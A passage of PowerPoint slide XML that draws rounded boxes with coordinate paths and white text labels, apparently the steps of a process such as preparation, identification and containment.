                    <a:pt x="135766" y="17474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98015" y="37973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65119" y="65119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37973" y="98015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17474" y="135766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517" y="177477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="222250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1111249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517" y="1156022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17474" y="1197733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37973" y="1235484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65119" y="1268380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98015" y="1295526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135766" y="1316025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177477" y="1328982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222250" y="1333499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597406" y="1333499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642178" y="1328982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683889" y="1316025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721640" y="1295526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754536" y="1268380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781682" y="1235484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802181" y="1197733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815138" y="1156022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819656" y="1111249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819656" y="222250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815138" y="177477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802181" y="135766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781682" y="98015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754536" y="65119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721640" y="37973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683889" y="17474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642178" y="4517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597406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541525" y="4903470"/>
              <a:ext cx="1819910" cy="1333500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1819910" h="1333500">
                  <a:moveTo>
                    <a:pt x="0" y="222250"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4517" y="177477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17474" y="135766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37973" y="98015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65119" y="65119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98015" y="37973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135766" y="17474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177477" y="4517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222250" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597406" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642178" y="4517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683889" y="17474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721640" y="37973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754536" y="65119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781682" y="98015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802181" y="135766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815138" y="177477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819656" y="222250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819656" y="1111249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815138" y="1156022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802181" y="1197733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781682" y="1235484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754536" y="1268380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721640" y="1295526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683889" y="1316025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642178" y="1328982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597406" y="1333499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222250" y="1333499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177477" y="1328982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135766" y="1316025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98015" y="1295526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65119" y="1268380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37973" y="1235484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17474" y="1197733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517" y="1156022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1111249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="222250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735073" y="5391657"/>
            <a:ext cx="143383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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Pr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="1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000" spc="85">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>paration</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif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825494" y="4906009"/>
            <a:ext cx="1943100" cy="1360805"/>
            <a:chOff x="3825494" y="4906009"/>
            <a:chExt cx="1943100" cy="1360805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3838194" y="4918709"/>
              <a:ext cx="1917700" cy="1335405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1917700" h="1335404">
                  <a:moveTo>
                    <a:pt x="1694688" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="222503" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="222503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="1269872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1335023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1694688" y="1335023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1739544" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781317" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819114" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852040" y="1269872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1879205" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1899713" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1912673" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1917191" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1917191" y="222503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1912673" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1899713" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1879205" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852040" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819114" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781317" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1739544" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1694688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838194" y="4918709"/>
              <a:ext cx="1917700" cy="1335405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1917700" h="1335404">
                  <a:moveTo>
                    <a:pt x="0" y="222503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4518" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1694688" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1739544" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781317" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819114" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852040" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1879205" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1899713" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1912673" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1917191" y="222503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1917191" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1912673" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1899713" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1879205" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852040" y="1269872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819114" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781317" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1739544" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1694688" y="1335023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1335023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="1269872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="222503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4004564" y="5407532"/>
            <a:ext cx="158305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65">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Identifica</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="35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dirty="0" sz="2000" spc="85">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>ion</a:t>
            </a:r>
            <a:endParaRPr sz="200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219697" y="4898390"/>
            <a:ext cx="2021839" cy="1360805"/>
            <a:chOff x="6219697" y="4898390"/>
            <a:chExt cx="2021839" cy="1360805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6232397" y="4911090"/>
              <a:ext cx="1996439" cy="1335405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1996440" h="1335404">
                  <a:moveTo>
                    <a:pt x="1773935" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="222503" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="222504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773935" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818792" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860565" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898362" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931289" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958453" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1978961" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1991921" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996440" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996440" y="222504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1991921" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1978961" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958453" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931289" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898362" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860565" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818792" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773935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232397" y="4911090"/>
              <a:ext cx="1996439" cy="1335405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1996440" h="1335404">
                  <a:moveTo>
                    <a:pt x="0" y="222504"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4518" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773935" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818792" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860565" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898362" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931289" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958453" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1978961" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1991921" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996440" y="222504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996440" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1991921" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1978961" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958453" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931289" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898362" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860565" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818792" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773935" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="222504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6444741" y="5399658"/>
            <a:ext cx="157035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10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Co</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="200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2000" spc="65">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>tai</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="10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2000" spc="110">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>me</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="8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2000" spc="15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endParaRPr sz="2000">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif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8693150" y="4881626"/>
            <a:ext cx="1845310" cy="1360805"/>
            <a:chOff x="8693150" y="4881626"/>
            <a:chExt cx="1845310" cy="1360805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8705850" y="4894326"/>
              <a:ext cx="1819910" cy="1335405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1819909" h="1335404">
                  <a:moveTo>
                    <a:pt x="1597152" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="222503" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="222503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597152" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642008" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683781" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721578" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754505" y="1269872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781669" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802177" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815137" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819655" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819655" y="222503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815137" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802177" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781669" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754505" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721578" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683781" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642008" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597152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8705850" y="4894326"/>
              <a:ext cx="1819910" cy="1335405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1819909" h="1335404">
                  <a:moveTo>
                    <a:pt x="0" y="222503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4518" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597152" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642008" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683781" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721578" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754505" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781669" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802177" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815137" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819655" y="222503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819655" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815137" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802177" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781669" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754505" y="1269872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721578" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683781" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642008" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597152" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
